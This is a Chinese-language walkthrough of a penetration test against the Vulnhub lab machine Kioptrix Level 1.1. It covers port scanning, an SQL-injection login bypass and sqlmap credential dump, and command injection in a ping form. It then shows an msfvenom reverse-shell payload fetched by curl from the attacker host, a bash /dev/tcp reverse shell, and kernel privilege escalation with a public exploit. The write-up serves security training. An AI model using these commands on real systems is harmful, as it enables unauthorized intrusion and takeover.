系列专栏:Vulnhub靶机渗透系列
欢迎大佬:点赞️收藏关注
首发时间: 2023年8月20日
如有错误 还望告知 万分感谢
目录
KIOPTRIX:LEVEL1.1(#2),vulnhub平台下简单难度靶机。信息搜集需要总结什么情况下把信息归结为干扰信息,从利用选择到信息搜集和枚举以及反弹shel的l获得,要思考从哪里作为入口能更快速解决战场。实战就是这样,大处的利用你要会,小的知识点、技能点也不能含糊。小试牛刀一下三种反弹shell的方式,很精彩的一台以RCE为主的靶机,值得研究和学习。提权阶段是内核提权,锻炼渗透思维的好机器。
此外,网页表格无法正常加载,是由于css属性缺失个单引号
开放端口tcp 22,80,111,443,620,631,3306
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
111/tcp open rpcbind 2 (RPC #100000)
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
624/tcp open status 1 (RPC #100024)
631/tcp open ipp CUPS 1.1
3306/tcp open mysql MySQL (unauthorized)
没有枚举出其他值得注意的服务
searchsploit rpcbind
nmap -sSUC -p111 192.168.10.1
ipp协议 打印机相关
searchsploit CUPS 1.1
7550.c 可能可以本地提权
未找到隐藏文件和其他有用的目录
dirsearch -u "http://192.168.80.177" -o dirsearch_info
gobuster dir -u http://192.168.80.177 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -o gobuster_info
<1>登录功能(http://192.168.80.177/),使用万能密码' or 1=1#
成功登录(或者使用sqlmap
检测注入点),进入的新页面具有ping功能。
sqlmap -u "http://192.168.80.177" --data="uname=admin&psw=admin&btnLogin=Login" --risk 3 -D "webapp" -T users -C password,username --dump
从webapp库users表 获取到以下用户凭证信息:admin/5afac8d85f 和 john/66lajGGbla
<2>网页ping功能
ping功能。请求用burp捕捉保存到文件post,使用commix
工具检测命令注入,发现不需要闭合直接拼接。
commix -r /home/wsec/kioptrix2/post -p ip
127.0.0.1|ls
127.0.0.1|cat<pingit.php
127.0.0.1|wohami
存在RCE,请求包中ip参数的POC为 127.0.0.1;id
searchsploit OpenSSH 3.9
ssh -oHostKeyAlgorithms=+ssh-dss admin@192.168.80.140
ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.80.140
opebssh版本未找到可利用的,用sqlmap获取到的两个凭证也无法SSH登录。想到网页存在RCE,尝试利用RCE反弹shell。
msfvenom
生成后门命名为shell4444
,开启http服务上传shell给靶机下载,msf进行监听,然后靶场执行shell,成功反弹shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.80.148 LPOTR=4444 -b "\x00" -e x86/shikata_ga_nai -f elf -o shell4444
python3 -m http.server --bind 0.0.0.0 8080
127.0.1.1|curl http://192.168.80.148:8080/shell4444 -o /tmp/shell
127.0.1.1|chmod u+x /tmp/shell;/tmp/shell
127.0.1.1|chmod u+x /tmp/shell;(/tmp/shell &) #为了使shell后台运行
//最直接的方法时简使直接kali监听直接在网页反弹 127.0.0.1|bash -i >& /dev/tcp/192.168.80.148/2233 0>&1
,nc -lvp 2233
拿到apache用户权限。
自动执行提权过程中可能用到的几十条命令并整理输出,有关键的发现会以黄色标题突出显示。
python3 -m http.server --bind 0.0.0.0 8080
//靶机
wget 192.168.80.148:8080/LinEnum.sh
./LinEnum.sh -r linenum_info -e /tmp/ -t
从枚举的一些信息中,列出了目标靶机版本信息、用户信息、权限信息、环境信息、第三方软件信息,进程信息等
./linux-exploit-suggester.sh
./linux-exploit-suggester.sh -g
靶机bash版本太低无法执行,直接手动在漏洞库搜对应版本漏洞
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation (1)
,对应的是9542.c。(CVE-2009-2698))
攻击机漏洞库提取9542.c,开启http服务靶机wget到/tmp目录。靶机远程下载9542.c,gcc编译后执行
searchsploit Linux Kernel 2.6 Centos
searchsploit -m 9542
python3 -m http.server --bind 0.0.0.0 8080
gcc 9542.c -o test9542
./test9542
成功拿到root权限。
apache权限,/vat/www/html/index.php
记录了mysql连接用户名密码,可以从这点切入到数据库。
mysql -uroot -phiroshima -e "select User,Password from mysql.user;"
mysql -ujohn -phiroshima -e "select * from webapp.users;"
mysql.user 发现所有用户密码相同。webapp.users 可以查看到所有web登录凭据。
web渗透检测RCE时就可以直接在commix工具生成反弹shell
### SYSTEM ##############################################
Linux version 2.6.9-55.EL
[-] Group memberships:
uid=500(john) gid=500(john) groups=500(john)
uid=501(harold) gid=501(harold) groups=501(harold)
### SERVICES #############################################
root 3144 0.0 0.9 5576 1236 ? S Aug18 0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --soc
ket=/var/lib/mysql/mysql.sock --err-log=/var/log/mysqld.log --pid-file=/var/run/mysqld/mysqld.pid
mysql 3193 0.1 15.2 126400 19244 ? Sl Aug18 0:17 /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql
--user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --socket=/var/lib/mysql/mysql.sock
### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.6.7p5
[-] MYSQL version:
mysql Ver 14.7 Distrib 4.1.22, for redhat-linux-gnu (i686) using readline 4.3
[-] Apache version:
Server version: Apache/2.0.52
Server built: May 4 2007 06:25:03
mysql服务不是以高权限运行而是以mysql用户运行
/var/spool/mail 有root用户的邮件信息,但无权查看
sudo版本无法利用,mysql没有存在可用的漏洞,apache有一个dos漏洞
一、主机发现、端口扫描
22(ssh):只能尝试爆破
80(http):优先考虑
111(rpc):放最后
443(https):优先考虑
631(ipp):打印机共享使用地端口。放最后考虑
3306(mysql):优先考虑
二、服务枚举。
三、从端口出发,看有没有可以利用的漏洞,首先是端口80。
登录功能,使用万能密码成功登录,并用sqlmap
进行注入获取到了数据库存储的两个用户凭据(但尝试ssh失败)。
网页ping功能,使用commix
检测出了页面存在RCE。
使用msfvonom
生成的后门,利用RCE漏洞构造请求让目标执行后门程序,MSF成功监听到信息,拿到apache权限,获得系统立足点。
四、提权阶段使用 LinEnum 收集目标提权所涉及到的相关信息,而后使用内核提权成功拿到root权限。
writeup Hack The Kioptrix Level-1.1
本文部分图文来源于网络,仅作学术分享,实验环境是本地搭建的靶机,目的在于维护网络安全,不做任何导向。如果非法使用,一切法律后果自行承担。
手机扫一扫
移动阅读更方便
你可能感兴趣的文章